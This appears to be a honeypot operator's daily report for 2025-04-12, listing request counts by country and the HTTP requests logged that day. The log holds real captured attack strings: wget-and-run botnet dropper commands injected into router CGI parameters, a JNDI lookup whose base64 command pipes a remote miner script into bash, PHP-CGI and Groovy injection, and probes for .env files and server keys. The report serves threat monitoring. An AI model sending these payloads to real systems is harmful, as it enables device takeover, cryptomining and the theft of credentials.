Skip to main content
  1. Daily-Posts/

Report: 2025-04-12

·546 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-12
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 47 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1857 requests were recorded during the day, originating from 4 different countries, with a peak of 420 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
USGermany
USGermany
JPGermany
SGGermany
USSingapore
MYAustralia
USDubai
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
222.85.37.31GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.85.37.31:43346/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
31.170.22.205GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(chmod+777+%2Ftmp%3B+cd+%2Ftmp%3B+wget+http%3A%2F%2F31.170.22.205%2Fdl17%3B+sh+dl17) HTTP/1.1
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(chmod+777+/tmp;cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
138POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D\x22\x22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1
344GET /$%7Bj$%7Bk8s:k5:-ND%7Di$%7Bsd:k5:-:%7Dldap://46.8.226.196:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1
882GET /AHT/AHT_UI/config.prod.js HTTP/1.1
1302GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1
1322GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1
1432GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1
1452GET /_all_dbs HTTP/1.1
1482GET /?rest_route=/wp/v2/users/ HTTP/1.1
1502GET /@vite/env HTTP/1.1
1552GET /about HTTP/1.1
2811POST /.env.development HTTP/1.1
2841POST /laravel/.env HTTP/1.1
3031POST /.env.project HTTP/1.1
3051POST /development/.env HTTP/1.1
3091POST /live_env HTTP/1.1
3151POST /admin-app/.env HTTP/1.1
3221POST /app/.env HTTP/1.1
3271GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1
3971GET /odinhttpcall1744439663 HTTP/1.1
4111GET /Odin/http/call1744439663 HTTP/1.1
4121GET /OdinHttpCall1744439663 HTTP/1.1
4161GET /api HTTP/1.1
4171GET /.env_example HTTP/1.1
4281GET /s/236313e2535313e29393e2933313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
4331GET /env.test.js HTTP/1.1
4351GET /config/settings.ini HTTP/1.1
4361GET /env.prod.js HTTP/1.1
4371GET /.venv HTTP/1.1
4401GET /.environment HTTP/1.1
4781GET /docker.sh HTTP/1.1
4801GET /src/app.js HTTP/1.1
4821GET /php5.ini HTTP/1.1
4831GET /dump.sh HTTP/1.1
4841GET /server.key HTTP/1.1
4871GET /storage/app/private/.env HTTP/1.1
5091POST /index HTTP/1.1
5111GET /s/3323e2832323e27353e21333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
5171\x00\x0E8\xF7\xBC\xA2\xAE\x8AV \xC6\x00\x00\x00\x00\x00
5181\x00\x0E\x08\xF7\xBC\xA2\xAE\x8AV \xC6\x00\x00\x00\x00\x00
5271GET /i2yH HTTP/1.1
5291GET /socket.io/1/?t=1744479887263 HTTP/1.1
5471GET /odinhttpcall1744426989 HTTP/1.1
5521GET /7iXd HTTP/1.1
5621GET /Odin/http/call1744426989 HTTP/1.1
5631GET /OdinHttpCall1744426989 HTTP/1.1
5921POST /apps/.env HTTP/1.1
5981GET /hhZ2 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0420GB
1345US
2198NL
3151SC
4144DE
5109MY
6108BG
7102PL
849VN
926CN
1023NO
1120HK
1219CH
1318FR
1417NG
1517LV
1612ID
179PT
187JP
196CA
206KR
216BE
225IN
234SG
244UA
254TH
264TR
274IR
283RU
293IT
302MD
312GR
322BR
331AU
341MC
351VE
361BD
371EE
381AE
391PK
401AO

Related

Report: 2025-04-11
·3097 words
Repport Daily
Report: 2025-04-10
·372 words
Repport Daily
Report: 2025-04-09
·2151 words
Repport Daily